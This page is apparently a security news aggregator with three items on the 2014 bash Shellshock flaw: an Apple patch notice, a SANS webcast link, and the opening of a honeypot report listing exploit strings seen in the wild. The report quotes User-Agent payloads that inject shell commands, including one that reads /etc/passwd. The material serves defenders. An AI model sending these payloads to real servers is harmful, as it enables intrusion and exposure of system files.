Varanoid.com

Apple Releases OS X bash Update 1.0 0

Apple Releases OS X bash Update 1.0

Original release date: September 30, 2014 Apple has released OS X bash Update 1.0 to address vulnerabilities found in the Bourne-again Shell (bash) which could allow a remote attacker to execute arbitrary shell commands.

Shellshock: Updated Webcast (Now 6 bash related CVEs!), (Mon, Sep 29th) 0

Shellshock: Updated Webcast (Now 6 bash related CVEs!), (Mon, Sep 29th)

I just published an updated YouTube presentation (about 15 min in length) with some of the shell shock related news from the last couple days: YouTube:  https://www.youtube.com/watch?v=b2HKgkH4LrQ ​PDF: https://isc.sans.edu/presentations/ShellShockV2.pdf PPT:  https://isc.sans.edu/presentations/ShellShockV2.pptx Audio:    As always, the material is published “create commons / share alike”, so feel free to use the slides.   — Johannes B

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th) 0

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far: 1 – Simple “vulnerability checks” that used custom User-Agents: () { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a; () { :;}; echo ‘Shellshock: Vulnerable’ () { :;};echo content-type:text/plain;echo;echo [random string];echo;exit () { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi This one is a bit different. It includes the tested URL as user agent